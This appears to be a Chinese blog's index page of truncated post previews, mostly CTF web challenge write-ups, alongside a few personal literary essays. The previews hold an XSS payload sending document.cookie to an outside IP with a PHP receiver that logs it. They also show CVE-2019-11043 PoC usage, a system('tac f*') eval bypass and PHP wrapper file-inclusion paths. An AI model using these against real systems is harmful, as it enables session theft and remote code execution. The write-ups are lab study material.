hacker
未读参考文献跨站脚本攻击XSS(最全最细致的靶场实战)_xss靶场-CSDN博客
XSS Platform
web 316123456789// a/php<?php$content = $_GET[1];if(isset($content)){ file_put_contents('tmp/flag.txt',$content);}else{ echo 'no input';}?>
记得给权限 chmod -R 777 ./tmp不然写不进去
12//h1xa<script>document.location.href='http://156.238.233.102/xss/a.php?1='+document.cookie</script>
网页跳转
web 317过滤了 <script>用 <img> 试试
1<img src="" onerror=locatio ...
hacker
未读web 311CVE-2019-11043Response => X-Powered-By: PHP/7.1.33devCVE-2019-11043
CVE-2019-11043漏洞是PHP的一个远程代码执行漏洞,该漏洞产生与Nginx利用fastcgi_split_path_info在处理带有 %0a 的请求时,会因为遇到换行符(%0a)导致PATH_INFO为空,最终可导致任意代码执行
普遍出现在Nginx+php-fpm环境中,且PHP版本在7.0-7.3之间
golang使用网上公开的 POC phuip-fpizdam
1234567sudo apt install golanggit clone https://github.com/neex/phuip-fpizdam.gitcd phuip-fpizdam//go env -w GOPROXY=https://goproxy.cngo get -v && go build
运行脚本1234567891011go run . "http://...../index.p ...
hacker
未读vulhub/struts2/github源码
OGNL
OGNL(Object Graph Navigation Language)是一种用于 Java 的表达式语言,它提供了一种方法来访问和操作对象图。OGNL 通常用于 Web 应用程序中,例如在 Struts 框架中,用于从 JavaBean 或对象中获取和设置属性值。
Object-Graph Navigation Language它是一种功能强大的表达式语言(Expression Language,简称为 EL),通过它简单一致的表达式语法,可以存取对象的任意属性,调用对象的方法,遍历整个对象的结构图,实现字段类型转化等功能。它使用相同的表达式去存取对象的属性。
OGNL 三要素:1、表达式(Expression)
表达式是整个 OGNL 的核心,所有的 OGNL 操作都是针对表达式的解析后进行的。表达式会规定此次 OGNL 操作到底要干什么。我们可以看到,在上面的测试中,name、department.name 等都是表达式,表示取 name 或者 department 中的 name 的值。OGN ...
hacker
未读web 25412345678910111213141516171819202122232425262728293031323334353637383940<?phpinclude('flag.php');class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->isVip; } public function login($u,$p){ if($this->username===$u&&$this->password===$p){ $this->isVip=true; } return $this- ...
hacker
未读web 29通配符绕过
题目
123$c = $_GET['c'];if(!preg_match("/flag/i", $c)){ eval($c);
preg_match :匹配正则表达式 模式分隔符后的”i”标记这是一个大小写不敏感的搜索 模式中的\b标记一个单词边界,所以只有独立的单词会被匹配,如:
123if (preg_match("/\\bweb\\b/i", "web")) :Trueif (preg_match("/\\bweb\\b/i", "website")) :False
小技巧:如果仅仅想要检查某个字符串是否包含另外一个字符串,不要使用 preg_match() , 使用 strpos() 会更快。 payload: (这里利用tac命令 同时记得加分号; )
1../?c=system('tac f*');
web 30题目
123456$c = $_GET['c'];if(!pr ...
晚上作为读者, 看书之后大脑里的部分思绪(或者想法),以此记录
此文为信狐狸变作公子身, 灯夜乐游春“纯文笔”
“欸 好啊”
以为是短篇小说
……
看完却无法平复心情
好干净的语言 好平和的内心呐
真切看到了一个干净纯粹的生命
这才是我最喜欢的文字
字里行间的是诗意
忽而又有似曾相识的感觉
好像许久之前我也是这样的人吧, 什么时候开始, 我写不出心里的感觉了..也没有试着去写过了
因为没人看吧
“自己也不在乎自己的想法吗?”
那不能, 对于不开心的事情自然会有不舒服的感觉吧
“感受和想法已经分不清呢”
不知道
从这里惊奇发现的种种, 仿佛自己早已经失去了
“你不做自己 很久了”
自从放下手中笔, 太久太久没有感受到如此的交流
那种不等待回应的交流
和文字本身的交流
(电子输入太扼杀文字啦, 不然我也不会存那么多表情包qwq)
我终于感到也许是太多人急于表达他们自己心中”理想”的自我
每每听到”我这个人..””我一般..””我其实..反而….”诸如此类的话语 , 按着我的头听ta定义 (或者解读?) 其自身是一个如何复杂神秘的大人物时, 往往让我感到悲伤又烦闷
需要正确, 这是庸俗人的标 ...
0x01 伪协议
PHP伪协议,也称为PHP流包装器,是一种在PHP中用于访问各种数据源的机制。这些数据源可以是本地文件系统、远程文件系统、PHP代码、压缩文件等。PHP伪协议允许开发者以统一的方式处理这些不同的数据源。
以下默认为: include $_GET[‘file’] , 且/?file=
1 ) file: //用于访问本地文件系统
1file://../../../../flag.php
2 ) http(s): //用于访问HTTP或HTTPS的URL
1http://www.CH0ico.fun/index.html
3 ) ftp: //用于访问FTP服务器
1ftp://ftp.example.com/pub/flag.txt
4 ) phar: //用于访问PHP归档文件(Phar)
1phar://../../../choco.phar
5 ) data: //用于将文本或base64编码的数据作为字符串流访问
data 伪协议是一 ...
RE_起点
0x01 Reversing-x64Elf-100exeinfo 64 位 ELF 文件,无壳
IDA 分析有 main 函数 , 跟进 (反编译)
1234567891011121314151617181920__int64 __fastcall main(int a1, char **a2, char **a3){ char s[264]; // [rsp+0h] [rbp-110h] BYREF unsigned __int64 v5; // [rsp+108h] [rbp-8h] v5 = __readfsqword(0x28u); printf("Enter the password: "); if ( !fgets(s, 255, stdin) ) return 0LL; if ( (unsigned int)sub_4006FD(s) ) { puts("Incorrect password!"); return 1LL; } else { ...
重读人间失格前言一本高中附庸风雅买的小书, 似乎是某次月考结束买回家放松的 (彼时除了读书几乎是一切活动都被禁止了)
当时只为书中之人所感慨, 也有部分的同情和理解, 看了两遍也就束之高阁了, 结果大学之后突然觉得书中之人与本人如此之相似, 又或者我潜移默化的受其影响如此深刻.
于是再拿出这本书细读摘录, 也算是反思自身以及当今的社会形势是否和太宰治时期所处环境一样
本文预感会摘抄非常之多… 那么就开始和太宰治先生对话.. (跳过部分用符号…等价 , 原文并无这种标点)
手记之一关于吃饭还有, 我也从不知道饥肠辘辘是何等滋味…这倒不是故意炫耀自己生长在不愁吃穿的富贵人家, 我还不至于那么愚蠢, 只是真的对饥肠辘辘的感觉一无所知…“人不吃饭就会饿死”, 这句话在我听来, 无异于一种讨厌的恐吓, 但这种迷信(直到今天, 我依旧觉得这是一种迷信) 却总是带给我不安与恐惧“人不吃饭就会饿死”,在我看来, 没有比这句话更晦涩难懂 , 更带有威吓性的言辞了总之,我对人类的营生仍旧迷惑不解
幸福自己的幸福观与世上所有人的幸福观格格不入, 这让我深感不安, 并因为这种不安而每夜辗转难眠乃至精神发狂尽管 ...
web 11234567891011121314<?phpclass User { public $username = 'admin'; public $password = 'secure_password';}$a = new User();echo base64_encode(serialize($a))."\n";
EXX不是”恶心心” 是 xxe 漏洞
查看源码
123456789101112131415161718192021222324252627282930313233<script type="text/javascript">function doLogin(){ var username = $("#username").val(); var password = $("#password").val(); if(username == "" || passw ...










